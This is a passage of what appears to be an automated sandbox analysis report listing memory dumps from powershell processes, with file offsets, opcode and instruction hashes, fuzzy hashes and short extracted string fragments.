                                                        • Snapshot File: hcaresult_4_2_7ffd9b1f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e236b12bb7fced0c627d8a50d8719ec71efc46b8457e5e3ddb217d1fb01c15d
                                                        • Instruction ID: 4fb967b96b9a79df8fbba6034499ed658dbb244eef1fb870a5000ea54cf0823b
                                                        • Opcode Fuzzy Hash: 1e236b12bb7fced0c627d8a50d8719ec71efc46b8457e5e3ddb217d1fb01c15d
                                                        • Instruction Fuzzy Hash: 93914773B0EA898FE769DB6884661687BE1EF55318F1400BED04DD71E3DD29AC41C345
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cc26fd6a6263157d8da8d863e3910c0ed46041d6a89d5dce17072e33b94d695
                                                        • Instruction ID: 336602aa267bedb11b185ce78b4de948f8d43e9fec3804e90286e2f6381852b3
                                                        • Opcode Fuzzy Hash: 6cc26fd6a6263157d8da8d863e3910c0ed46041d6a89d5dce17072e33b94d695
                                                        • Instruction Fuzzy Hash: 52310D31A2A64E8EFBB49F58CC2ABF932D1FF4131DF414139D44D960A2CA396A85CB11
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                        • Instruction ID: 5004c912797fa5de54a08eeb6e6b4a8434c1f80db3f3e8eee4f15695996a7ab3
                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                        • Instruction Fuzzy Hash: 3201677121CB0C4FD748EF0CE451AA5B7E0FB95364F10056DE58AC36A5D636E881CB45
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869842046.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b1f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d885b1242c2f62eb2a17b5a064c52a67399cee03e9fb4806513f8aad7ea23fd
                                                        • Instruction ID: 37bf983555e4ae7eba7a5e7799e60d01868418d7d723ccaa2e0300ddaaad9360
                                                        • Opcode Fuzzy Hash: 2d885b1242c2f62eb2a17b5a064c52a67399cee03e9fb4806513f8aad7ea23fd
                                                        • Instruction Fuzzy Hash: D5E09A23F0E86E0EEBB1EA98282D1F86A81EF55B2570901B6E92CE31B1DC009C108381
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 233867fc90185c08c2bdf2fc463a0285917d6bc71c0941dea84fe5c189b15d5b
                                                        • Instruction ID: 25a0a411043c813219834c8e366a85f97789d359366eba799566387e5e0a42aa
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                        • API String ID: 0-1608119003
                                                        • Opcode ID: 8d4ac498fb55259800ee6ecacd845159317290468ca31614b63dfdc8f95f7859
                                                        • Instruction ID: 1084cbef8721660a7a34094fcd16640524d7487413b3fe360bf8119d37a25bb1
                                                        • Opcode Fuzzy Hash: 8d4ac498fb55259800ee6ecacd845159317290468ca31614b63dfdc8f95f7859
                                                        • Instruction Fuzzy Hash: FE913B33F043B48FDB65CB68941566ABBE2AFC1610F1484AAD845CF361DB35DC45C7A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$_$$^q$$^q$$^q
                                                        • API String ID: 0-2619997885
                                                        • Opcode ID: c919cea090e142f82a674fa3550f31e316a8d5f4007c19bd3af58c1d59f042f4
                                                        • Instruction ID: e1ed7a8c596766b22ded4714929ba62db80c6fde473f69694bda1876c91e6984
                                                        • Opcode Fuzzy Hash: c919cea090e142f82a674fa3550f31e316a8d5f4007c19bd3af58c1d59f042f4
                                                        • Instruction Fuzzy Hash: EC912D31F043259FDB95CB6CD81166ABBE6AFC1210B18C4AAD906CF356DF36C845C7A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$]$tP^q$tP^q$$^q
                                                        • API String ID: 0-3639875650
                                                        • Opcode ID: 042b9a5ddc0334a0e33b5b4c22b15feb13276c90dfb00e4e996e189eeef3eaf3
                                                        • Instruction ID: 4e986c7f8cabb322b2f2fa7f9ddf8937d7a70ff7d3b0f2481803f688dffb6802
                                                        • Opcode Fuzzy Hash: 042b9a5ddc0334a0e33b5b4c22b15feb13276c90dfb00e4e996e189eeef3eaf3
                                                        • Instruction Fuzzy Hash: 07814B33F093A5CFDB61CB68840576ABFF2AF82310F1484AAD545CF255DA35C885C7A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$_
                                                        • API String ID: 0-798638599
                                                        • Opcode ID: 4d50a705e49634a20243723708f7d059f3a0dd36e63aa9d9c5070fcf450929e9
                                                        • Instruction ID: 8c548b56d73059bb000a7056ab424891d7188786d4ab4e99d367aa7236825d42
                                                        • Opcode Fuzzy Hash: 4d50a705e49634a20243723708f7d059f3a0dd36e63aa9d9c5070fcf450929e9
                                                        • Instruction Fuzzy Hash: 9E91E535F04369CFCB94DB78D50466ABBE6AF85210B18C4AAD815CF356DB32CC85C7A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$]$tP^q$tP^q
                                                        • API String ID: 0-1646045720
                                                        • Opcode ID: d88d2a5e421f2e46fec5d34b76438fb4a3464edde2131774dacb93bb9ac38c34
                                                        • Instruction ID: 814283e5a82166e5f3a502e3cb9efa828b184049aba8d6d3bfa490abf512c48a
                                                        • Opcode Fuzzy Hash: d88d2a5e421f2e46fec5d34b76438fb4a3464edde2131774dacb93bb9ac38c34
                                                        • Instruction Fuzzy Hash: BD813C33F043A59FD761DB68990176ABFE1AF81310F14846AD915CF292DB32D885C7D2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$]$tP^q$tP^q
                                                        • API String ID: 0-1646045720
                                                        • Opcode ID: f7e30c2d079aa3448c93deaf809a309527224b86fcdfd5ea572f8d7bddf39f5d
                                                        • Instruction ID: c960a5de764a49f8097f2cf1a2828cbcf6c5e9ab496f664edd9cbde2d2f45d40
                                                        • Opcode Fuzzy Hash: f7e30c2d079aa3448c93deaf809a309527224b86fcdfd5ea572f8d7bddf39f5d
                                                        • Instruction Fuzzy Hash: 61713833F483A59FDBA4CB6C9400B66BBE2AFC6710F1484AAD505CF351DA31D885C7A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$$^q$$^q
                                                        • API String ID: 0-2831958266
                                                        • Opcode ID: 737c1e8bb82470625be1b9f53312ac3aac57d1a831629957906265c2a766130b
                                                        • Instruction ID: cebfc8e9c64042205a36a9afd86fedcc0d77985aff092700da59883bf919fee8
                                                        • Opcode Fuzzy Hash: 737c1e8bb82470625be1b9f53312ac3aac57d1a831629957906265c2a766130b
                                                        • Instruction Fuzzy Hash: DD114811B493A95FD76F223C28205996FF65BC255031904EBD041CF35BCD108C8AC3A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: 53ea9ceb89d6333c9f008bd88dc706215610d62e3911fd8960b455ca0af45b3e
                                                        • Instruction ID: f39992ed37dfd27de0c3c0a0d6dbac82552fba0f73a01fe40c07f90c8e0dbc2b
                                                        • Opcode Fuzzy Hash: 53ea9ceb89d6333c9f008bd88dc706215610d62e3911fd8960b455ca0af45b3e
                                                        • Instruction Fuzzy Hash: F9212736F003295BDBA4597E9800B27BADA9FC0759F24882AA805DF385DE36C845C3A1